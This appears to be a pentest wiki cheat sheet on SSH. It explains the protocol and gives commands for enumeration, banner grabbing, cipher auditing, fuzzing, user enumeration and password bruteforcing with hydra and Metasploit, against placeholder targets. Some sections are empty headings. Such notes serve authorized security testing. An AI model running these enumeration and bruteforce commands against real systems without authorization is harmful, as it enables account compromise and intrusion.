SSH

Theory

The SSH protocol (Secure Shell) is used to login from one machine to another securely. It offers several options for strong authentication, as it protects the connections and communications security and integrity with strong encryption. This connection can be used for terminal access, file transfers, and for tunneling other applications.

Enumeration

Authentication type

It is possible to enumerate the allowed authentication types with the following command:

ssh -v <IP>
OpenSSH_8.1p1, OpenSSL 1.1.1d  10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

Banner Grabbing

Useful to get basic information about the SSH server such as its type and version.

nc -vn <IP> 22
...
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7

Server's public SSH key

ssh-keyscan -t rsa <IP> -p <PORT>

Weak Cipher Algorithms

Some auditing tools can help to quikly find the target version and which algorithms are available on the server in order to give recommendations to the customer.

sslscan <IP>:22

nmap -p22 -n -sV --script ssh2-enum-algos <IP>

ssh-audit -p 22 -4 <IP>

SSH fuzzing

msfconsole
use auxiliary/fuzzers/ssh/ssh_version_2
set RHOSTS <IP>
run

Attacks

Weak cryptographic keys

Authentication bruteforcing

User enumeration

msfconsole
use scanner/ssh/ssh_enumusers
set RHOSTS <IP>
set USER_FILE <user_file_path>

Password Bruteforcing

hydra -l <user> -s 22 -P <path_pass_list> <IP> -t 4 ssh

msfconsole
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE /usr/share/wordlists/password/rockyou.txt
set RHOSTS <IP>
set STOP_ON_SUCCESS true
set username <USER>
run

Private key Bruteforcing

Resources